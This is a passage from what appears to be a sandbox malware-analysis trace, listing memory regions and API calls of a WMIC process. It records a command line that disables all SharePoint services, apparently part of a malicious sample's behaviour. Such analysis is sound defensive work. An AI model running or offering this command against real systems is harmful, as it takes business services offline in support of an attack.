"c:\\windows\\syswow64\\wbem\\en-us\\wmiutils.dll.mui") Region: id = 4962 start_va = 0x6fb0000 end_va = 0x70affff entry_point = 0x0 region_type = private name = "private_0x0000000006fb0000" filename = "" Region: id = 4963 start_va = 0x77840000 end_va = 0x77897fff entry_point = 0x77840000 region_type = mapped_file name = "coml2.dll" filename = "\\Windows\\SysWOW64\\coml2.dll" (normalized: "c:\\windows\\syswow64\\coml2.dll") Region: id = 4964 start_va = 0x74040000 end_va = 0x740befff entry_point = 0x74040000 region_type = mapped_file name = "vbscript.dll" filename = "\\Windows\\SysWOW64\\vbscript.dll" (normalized: "c:\\windows\\syswow64\\vbscript.dll") Region: id = 4965 start_va = 0x74030000 end_va = 0x7403cfff entry_point = 0x74030000 region_type = mapped_file name = "amsi.dll" filename = "\\Windows\\SysWOW64\\amsi.dll" (normalized: "c:\\windows\\syswow64\\amsi.dll") Region: id = 4966 start_va = 0x74010000 end_va = 0x74025fff entry_point = 0x74010000 region_type = mapped_file name = "mpoav.dll" filename = "\\Program Files (x86)\\Windows Defender\\MpOAV.dll" (normalized: "c:\\program files (x86)\\windows defender\\mpoav.dll") Region: id = 4967 start_va = 0x74000000 end_va = 0x74007fff entry_point = 0x74000000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 4968 start_va = 0x6f50000 end_va = 0x6f75fff entry_point = 0x6f50000 region_type = mapped_file name = "msxml3.dll" filename = "\\Windows\\SysWOW64\\msxml3.dll" (normalized: "c:\\windows\\syswow64\\msxml3.dll") Region: id = 4969 start_va = 0x73f80000 end_va = 0x73ffffff entry_point = 0x73f80000 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\SysWOW64\\sxs.dll" (normalized: "c:\\windows\\syswow64\\sxs.dll") Region: id = 4970 start_va = 0xf50000 end_va = 0xf54fff entry_point = 0xf50000 region_type = mapped_file name = "stdole2.tlb" filename = "\\Windows\\SysWOW64\\stdole2.tlb" (normalized: "c:\\windows\\syswow64\\stdole2.tlb") Region: id = 4971 start_va = 0x70b0000 end_va = 0x74befff entry_point = 0x0 region_type = private name = "private_0x00000000070b0000" filename = "" Thread: id = 322 os_tid = 0xca0 [0121.402] GetModuleHandleA (lpModuleName=0x0) returned 0x1300000 [0121.402] __set_app_type (_Type=0x1) [0121.402] __p__fmode () returned 0x77ac4d6c [0121.402] __p__commode () returned 0x77ac5b1c [0121.402] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x133aa90) returned 0x0 [0121.402] __wgetmainargs (in: _Argc=0x13491a8, _Argv=0x13491ac, _Env=0x13491b0, _DoWildCard=0, _StartInfo=0x13491bc | out: _Argc=0x13491a8, _Argv=0x13491ac, _Env=0x13491b0) returned 0 [0121.403] ??0CHString@@QAE@XZ () returned 0x13495ec [0121.403] ??0CHString@@QAE@XZ () returned 0x13498fc [0121.403] ?Empty@CHString@@QAEXXZ () returned 0x74a66424 [0121.403] SetConsoleCtrlHandler (HandlerRoutine=0x1334980, Add=1) returned 1 [0121.403] _onexit (_Func=0x1340a20) returned 0x1340a20 [0121.403] _onexit (_Func=0x1340a30) returned 0x1340a30 [0121.403] _onexit (_Func=0x1340a50) returned 0x1340a50 [0121.403] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0121.403] ResolveDelayLoadedAPI () returned 0x770fcd50 [0121.403] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0121.405] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x1, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0 [0121.410] CoCreateInstance (in: rclsid=0x1306a1c*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x1306a2c*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x1349510 | out: ppv=0x1349510*=0x943428) returned 0x0 [0121.419] GetCurrentProcess () returned 0xffffffff [0121.419] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x28, TokenHandle=0x88fb94 | out: TokenHandle=0x88fb94*=0x158) returned 1 [0121.419] GetTokenInformation (in: TokenHandle=0x158, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x88fb90 | out: TokenInformation=0x0, ReturnLength=0x88fb90) returned 0 [0121.419] GetTokenInformation (in: TokenHandle=0x158, TokenInformationClass=0x3, TokenInformation=0xb43a38, TokenInformationLength=0x118, ReturnLength=0x88fb90 | out: TokenInformation=0xb43a38, ReturnLength=0x88fb90) returned 1 [0121.420] AdjustTokenPrivileges (in: TokenHandle=0x158, DisableAllPrivileges=0, NewState=0xb43a38*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x8, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x9, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xa, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xc, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xd, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xe, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x11, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x12, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x13, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x16, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x17, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x18, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1c, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1d, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x1e, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x22, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x23, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0121.420] CloseHandle (hObject=0x158) returned 1 [0121.420] SetThreadUILanguage (LangId=0x0) returned 0x409 [0121.422] _vsnwprintf (in: _Buffer=0xb43ac8, _BufferCount=0x1f, _Format="ms_%x", _ArgList=0x88fb1c | out: _Buffer="ms_409") returned 6 [0121.422] GetComputerNameW (in: lpBuffer=0xb43b10, nSize=0x88fb80 | out: lpBuffer="LHNIWSJ", nSize=0x88fb80) returned 1 [0121.422] lstrlenW (lpString="LHNIWSJ") returned 7 [0121.422] lstrlenW (lpString="LHNIWSJ") returned 7 [0121.422] ResolveDelayLoadedAPI () returned 0x74d5c5f0 [0121.422] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x0, nSize=0x88fb94 | out: lpNameBuffer=0x0, nSize=0x88fb94) returned 0x0 [0121.423] GetLastError () returned 0xea [0121.423] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0xb43b50, nSize=0x88fb94 | out: lpNameBuffer="LHNIWSJ\\CIiHmnxMn6Ps", nSize=0x88fb94) returned 0x1 [0121.423] lstrlenW (lpString="") returned 0 [0121.423] lstrlenW (lpString="LHNIWSJ") returned 7 [0121.423] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="LHNIWSJ", cchCount1=7, lpString2="", cchCount2=0) returned 3 [0121.424] lstrlenW (lpString=".") returned 1 [0121.424] lstrlenW (lpString="LHNIWSJ") returned 7 [0121.424] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="LHNIWSJ", cchCount1=7, lpString2=".", cchCount2=1) returned 3 [0121.424] lstrlenW (lpString="LOCALHOST") returned 9 [0121.424] lstrlenW (lpString="LHNIWSJ") returned 7 [0121.424] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="LHNIWSJ", cchCount1=7, lpString2="LOCALHOST", cchCount2=9) returned 1 [0121.424] lstrlenW (lpString="LHNIWSJ") returned 7 [0121.424] lstrlenW (lpString="LHNIWSJ") returned 7 [0121.424] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="LHNIWSJ", cchCount1=7, lpString2="LHNIWSJ", cchCount2=7) returned 2 [0121.424] lstrlenW (lpString="LHNIWSJ") returned 7 [0121.424] lstrlenW (lpString="LHNIWSJ") returned 7 [0121.424] lstrlenW (lpString="LHNIWSJ") returned 7 [0121.424] lstrlenW (lpString="LHNIWSJ") returned 7 [0121.425] ResolveDelayLoadedAPI () returned 0x77bb9840 [0121.426] SysStringLen (param_1="IDENTIFY") returned 0x8 [0121.426] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0121.426] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0121.426] SysStringLen (param_1="IDENTIFY") returned 0x8 [0121.426] SysStringLen (param_1="IMPERSONATE") returned 0xb [0121.427] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0121.427] SysStringLen (param_1="IMPERSONATE") returned 0xb [0121.427] SysStringLen (param_1="IDENTIFY") returned 0x8 [0121.427] SysStringLen (param_1="IDENTIFY") returned 0x8 [0121.427] SysStringLen (param_1="IMPERSONATE") returned 0xb [0121.427] SysStringLen (param_1="DELEGATE") returned 0x8 [0121.427] SysStringLen (param_1="IDENTIFY") returned 0x8 [0121.427] SysStringLen (param_1="DELEGATE") returned 0x8 [0121.427] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0121.427] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0121.427] SysStringLen (param_1="DELEGATE") returned 0x8 [0121.427] SysStringLen (param_1="NONE") returned 0x4 [0121.427] SysStringLen (param_1="DEFAULT") returned 0x7 [0121.427] SysStringLen (param_1="DEFAULT") returned 0x7 [0121.427] SysStringLen (param_1="NONE") returned 0x4 [0121.427] SysStringLen (param_1="CONNECT") returned 0x7 [0121.427] SysStringLen (param_1="DEFAULT") returned 0x7 [0121.427] SysStringLen (param_1="CALL") returned 0x4 [0121.427] SysStringLen (param_1="DEFAULT") returned 0x7 [0121.427] SysStringLen (param_1="CALL") returned 0x4 [0121.427] SysStringLen (param_1="CONNECT") returned 0x7 [0121.428] SysStringLen (param_1="PKT") returned 0x3 [0121.428] SysStringLen (param_1="DEFAULT") returned 0x7 [0121.428] SysStringLen (param_1="PKT") returned 0x3 [0121.428] SysStringLen (param_1="NONE") returned 0x4 [0121.428] SysStringLen (param_1="NONE") returned 0x4 [0121.428] SysStringLen (param_1="PKT") returned 0x3 [0121.428] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0121.428] SysStringLen (param_1="DEFAULT") returned 0x7 [0121.428] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0121.428] SysStringLen (param_1="NONE") returned 0x4 [0121.428] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0121.428] SysStringLen (param_1="PKT") returned 0x3 [0121.428] SysStringLen (param_1="PKT") returned 0x3 [0121.428] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0121.428] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0121.428] SysStringLen (param_1="DEFAULT") returned 0x7 [0121.428] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0121.428] SysStringLen (param_1="PKT") returned 0x3 [0121.428] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0121.428] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0121.428] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0121.428] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0121.428] GetSystemDirectoryW (in: lpBuffer=0xb429d8, uSize=0x105 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0121.428] SysStringLen (param_1="C:\\Windows\\system32") returned 0x13 [0121.428] SysStringLen (param_1="\\wbem\\") returned 0x6 [0121.428] SysStringByteLen (bstr="C:\\Windows\\system32\\wbem\\") returned 0x32 [0121.428] SysStringLen (param_1="C:\\Windows\\system32\\wbem\\") returned 0x19 [0121.428] SysStringLen (param_1="XSL-Mappings.xml") returned 0x10 [0121.429] GetCurrentThreadId () returned 0xca0 [0121.429] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Wbem\\CIMOM", ulOptions=0x0, samDesired=0x1, phkResult=0x88f6a4 | out: phkResult=0x88f6a4*=0x164) returned 0x0 [0121.429] RegQueryValueExW (in: hKey=0x164, lpValueName="Logging", lpReserved=0x0, lpType=0x0, lpData=0x88f6b0, lpcbData=0x88f6ac*=0x400 | out: lpType=0x0, lpData=0x88f6b0*=0x30, lpcbData=0x88f6ac*=0x4) returned 0x0 [0121.429] _wcsicmp (_String1="0", _String2="1") returned -1 [0121.429] _wcsicmp (_String1="0", _String2="2") returned -2 [0121.429] RegQueryValueExW (in: hKey=0x164, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x88f6ac*=0x4 | out: lpType=0x0, lpData=0x0, lpcbData=0x88f6ac*=0x42) returned 0x0 [0121.429] RegQueryValueExW (in: hKey=0x164, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0xb42be0, lpcbData=0x88f6ac*=0x42 | out: lpType=0x0, lpData=0xb42be0*=0x25, lpcbData=0x88f6ac*=0x42) returned 0x0 [0121.429] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0121.429] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0121.429] RegQueryValueExW (in: hKey=0x164, lpValueName="Log File Max Size", lpReserved=0x0, lpType=0x0, lpData=0x88f6b0, lpcbData=0x88f6ac*=0x400 | out: lpType=0x0, lpData=0x88f6b0*=0x36, lpcbData=0x88f6ac*=0xc) returned 0x0 [0121.429] _wtol (_String="65536") returned 65536 [0121.429] RegCloseKey (hKey=0x0) returned 0x6 [0121.429] CoCreateInstance (in: rclsid=0x1306a7c*(Data1=0xf6d90f12, Data2=0x9c73, Data3=0x11d3, Data4=([0]=0xb3, [1]=0x2e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0xb, [7]=0xb4)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x1306a8c*(Data1=0x2933bf95, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppv=0x88fb44 | out: ppv=0x88fb44*=0x10245a8) returned 0x0 [0121.438] FreeThreadedDOMDocument:IXMLDOMDocument:Load (in: This=0x10245a8, xmlSource=0x88fac4*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Windows\\system32\\wbem\\XSL-Mappings.xml", varVal2=0x0), isSuccessful=0x88fb28 | out: isSuccessful=0x88fb28*=0xffff) returned 0x0 [0121.480] FreeThreadedDOMDocument:IXMLDOMDocument:get_documentElement (in: This=0x10245a8, DOMElement=0x88fb3c | out: DOMElement=0x88fb3c) returned 0x0 [0121.481] SysStringLen (param_1="VALUE") returned 0x5 [0121.481] SysStringLen (param_1="TABLE") returned 0x5 [0121.481] SysStringLen (param_1="TABLE") returned 0x5 [0121.481] SysStringLen (param_1="VALUE") returned 0x5 [0121.482] SysStringLen (param_1="LIST") returned 0x4 [0121.482] SysStringLen (param_1="TABLE") returned 0x5 [0121.482] SysStringLen (param_1="RAWXML") returned 0x6 [0121.482] SysStringLen (param_1="TABLE") returned 0x5 [0121.482] SysStringLen (param_1="RAWXML") returned 0x6 [0121.482] SysStringLen (param_1="LIST") returned 0x4 [0121.482] SysStringLen (param_1="LIST") returned 0x4 [0121.482] SysStringLen (param_1="RAWXML") returned 0x6 [0121.482] SysStringLen (param_1="HTABLE") returned 0x6 [0121.482] SysStringLen (param_1="TABLE") returned 0x5 [0121.482] SysStringLen (param_1="HTABLE") returned 0x6 [0121.482] SysStringLen (param_1="LIST") returned 0x4 [0121.483] SysStringLen (param_1="HFORM") returned 0x5 [0121.483] SysStringLen (param_1="TABLE") returned 0x5 [0121.483] SysStringLen (param_1="HFORM") returned 0x5 [0121.483] SysStringLen (param_1="LIST") returned 0x4 [0121.483] SysStringLen (param_1="HFORM") returned 0x5 [0121.483] SysStringLen (param_1="HTABLE") returned 0x6 [0121.483] SysStringLen (param_1="XML") returned 0x3 [0121.483] SysStringLen (param_1="TABLE") returned 0x5 [0121.483] SysStringLen (param_1="XML") returned 0x3 [0121.483] SysStringLen (param_1="VALUE") returned 0x5 [0121.483] SysStringLen (param_1="VALUE") returned 0x5 [0121.483] SysStringLen (param_1="XML") returned 0x3 [0121.484] SysStringLen (param_1="MOF") returned 0x3 [0121.484] SysStringLen (param_1="TABLE") returned 0x5 [0121.484] SysStringLen (param_1="MOF") returned 0x3 [0121.484] SysStringLen (param_1="LIST") returned 0x4 [0121.484] SysStringLen (param_1="MOF") returned 0x3 [0121.484] SysStringLen (param_1="RAWXML") returned 0x6 [0121.484] SysStringLen (param_1="LIST") returned 0x4 [0121.484] SysStringLen (param_1="MOF") returned 0x3 [0121.484] SysStringLen (param_1="CSV") returned 0x3 [0121.484] SysStringLen (param_1="TABLE") returned 0x5 [0121.484] SysStringLen (param_1="CSV") returned 0x3 [0121.484] SysStringLen (param_1="LIST") returned 0x4 [0121.484] SysStringLen (param_1="CSV") returned 0x3 [0121.484] SysStringLen (param_1="HTABLE") returned 0x6 [0121.484] SysStringLen (param_1="CSV") returned 0x3 [0121.484] SysStringLen (param_1="HFORM") returned 0x5 [0121.485] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0121.485] SysStringLen (param_1="TABLE") returned 0x5 [0121.485] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0121.485] SysStringLen (param_1="VALUE") returned 0x5 [0121.485] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0121.485] SysStringLen (param_1="XML") returned 0x3 [0121.485] SysStringLen (param_1="XML") returned 0x3 [0121.485] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0121.485] SysStringLen (param_1="texttablewsys") returned 0xd [0121.485] SysStringLen (param_1="TABLE") returned 0x5 [0121.485] SysStringLen (param_1="texttablewsys") returned 0xd [0121.486] SysStringLen (param_1="XML") returned 0x3 [0121.486] SysStringLen (param_1="texttablewsys") returned 0xd [0121.486] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0121.486] SysStringLen (param_1="XML") returned 0x3 [0121.486] SysStringLen (param_1="texttablewsys") returned 0xd [0121.486] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0121.486] SysStringLen (param_1="TABLE") returned 0x5 [0121.486] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0121.486] SysStringLen (param_1="XML") returned 0x3 [0121.486] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0121.486] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0121.486] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0121.486] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0121.486] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0121.486] SysStringLen (param_1="TABLE") returned 0x5 [0121.486] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0121.486] SysStringLen (param_1="XML") returned 0x3 [0121.486] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0121.487] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0121.487] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0121.487] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0121.487] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0121.487] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0121.487] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0121.487] SysStringLen (param_1="TABLE") returned 0x5 [0121.487] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0121.487] SysStringLen (param_1="XML") returned 0x3 [0121.487] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0121.487] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0121.487] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0121.487] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0121.487] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0121.487] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0121.487] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0121.488] SysStringLen (param_1="TABLE") returned 0x5 [0121.488] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0121.488] SysStringLen (param_1="XML") returned 0x3 [0121.488] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0121.488] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0121.488] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0121.488] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0121.488] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0121.488] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0121.488] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0121.488] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0121.488] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0121.488] SysStringLen (param_1="TABLE") returned 0x5 [0121.488] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0121.488] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0121.488] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0121.488] SysStringLen (param_1="XML") returned 0x3 [0121.488] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0121.488] SysStringLen (param_1="texttablewsys") returned 0xd [0121.488] SysStringLen (param_1="XML") returned 0x3 [0121.488] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0121.489] SysStringLen (param_1="htable-sortby") returned 0xd [0121.489] SysStringLen (param_1="TABLE") returned 0x5 [0121.489] SysStringLen (param_1="htable-sortby") returned 0xd [0121.489] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0121.489] SysStringLen (param_1="htable-sortby") returned 0xd [0121.489] SysStringLen (param_1="XML") returned 0x3 [0121.489] SysStringLen (param_1="htable-sortby") returned 0xd [0121.489] SysStringLen (param_1="texttablewsys") returned 0xd [0121.489] SysStringLen (param_1="htable-sortby") returned 0xd [0121.489] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0121.489] SysStringLen (param_1="XML") returned 0x3 [0121.489] SysStringLen (param_1="htable-sortby") returned 0xd [0121.489] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0121.489] SysStringLen (param_1="TABLE") returned 0x5 [0121.489] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0121.489] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0121.489] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0121.489] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0121.489] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0121.489] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0121.489] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0121.489] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0121.490] SysStringLen (param_1="wmiclimofformat") returned 0xf [0121.490] SysStringLen (param_1="TABLE") returned 0x5 [0121.490] SysStringLen (param_1="wmiclimofformat") returned 0xf [0121.490] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0121.490] SysStringLen (param_1="wmiclimofformat") returned 0xf [0121.490] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0121.490] SysStringLen (param_1="wmiclimofformat") returned 0xf [0121.490] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0121.490] SysStringLen (param_1="wmiclimofformat") returned 0xf [0121.490] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0121.490] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0121.490] SysStringLen (param_1="wmiclimofformat") returned 0xf [0121.490] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0121.490] SysStringLen (param_1="TABLE") returned 0x5 [0121.490] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0121.490] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0121.490] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0121.490] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0121.490] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0121.490] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0121.490] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0121.490] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0121.491] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0121.491] SysStringLen (param_1="TABLE") returned 0x5 [0121.491] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0121.491] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0121.491] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0121.491] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0121.491] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0121.491] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0121.491] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0121.491] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0121.491] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0121.491] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0121.491] FreeThreadedDOMDocument:IUnknown:Release (This=0x10245a8) returned 0x0 [0121.491] GetCommandLineW () returned="WMIC SERVICE WHERE 'caption LIKE '%SharePoint%'CALL ChangeStartMode 'Disabled'" [0121.491] memcpy_s (in: _Destination=0xb48060, _DestinationSize=0xae, _Source=0x931588, _SourceSize=0xa0 | out: _Destination=0xb48060) returned 0x0 [0121.491] GetLocalTime (in: lpSystemTime=0x88faec | out: lpSystemTime=0x88faec*(wYear=0x7e2, wMonth=0x4, wDayOfWeek=0x0, wDay=0xf, wHour=0xa, wMinute=0x9, wSecond=0xe, wMilliseconds=0x15a)) [0121.492] _vsnwprintf (in: _Buffer=0xb48118, _BufferCount=0x3f, _Format="%.2d-%.2d-%.4dT%.2d:%.2d:%.2d", _ArgList=0x88facc | out: _Buffer="04-15-2018T10:09:14") returned 19 [0121.492] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%SharePoint%'CALL ChangeStartMode 'Disabled'") returned 76 [0121.492] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%SharePoint%'CALL ChangeStartMode 'Disabled'") returned 76 [0121.492] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%SharePoint%'CALL ChangeStartMode 'Disabled'") returned 76 [0121.492] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%SharePoint%'CALL ChangeStartMode 'Disabled'") returned 76 [0121.492] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%SharePoint%'CALL ChangeStartMode 'Disabled'") returned 76 [0121.492] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%SharePoint%'CALL ChangeStartMode 'Disabled'") returned 76 [0121.492] lstrlenW (lpString="SERVICE") returned 7 [0121.492] _wcsicmp (_String1="SERVICE", _String2="\"NULL\"") returned 81 [0121.492] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%SharePoint%'CALL ChangeStartMode 'Disabled'") returned 76 [0121.492] lstrlenW (lpString="WHERE") returned 5 [0121.492] _wcsicmp (_String1="WHERE", _String2="\"NULL\"") returned 85 [0121.492] memmove_s (in: _Destination=0xb42c78, _DestinationSize=0x4, _Source=0xb42c68, _SourceSize=0x4 | out: _Destination=0xb42c78) returned 0x0 [0121.492] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%SharePoint%'CALL ChangeStartMode 'Disabled'") returned 76 [0121.492] lstrlenW (lpString="'caption LIKE '%SharePoint%'CALL ChangeStartMode 'Disabled'") returned 60 [0121.492] _wcsicmp (_String1="'caption LIKE '%SharePoint%'CALL ChangeStartMode 'Disabled'", _String2="\"NULL\"") returned 5 [0121.492] lstrlenW (lpString="'caption LIKE '%SharePoint%'CALL ChangeStartMode 'Disabled'") returned 60 [0121.492] lstrlenW (lpString="'caption LIKE '%SharePoint%'CALL ChangeStartMode 'Disabled'") returned 60 [0121.492] memmove_s (in: _Destination=0xb47eb0, _DestinationSize=0x8, _Source=0xb42c78, _SourceSize=0x8 | out: _Destination=0xb47eb0) returned 0x0 [0121.492] lstrlenW (lpString="QUIT") returned 4 [0121.492] lstrlenW (lpString="SERVICE") returned 7 [0121.492] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="SERVICE", cchCount1=7, lpString2="QUIT", cchCount2=4) returned 3 [0121.492] 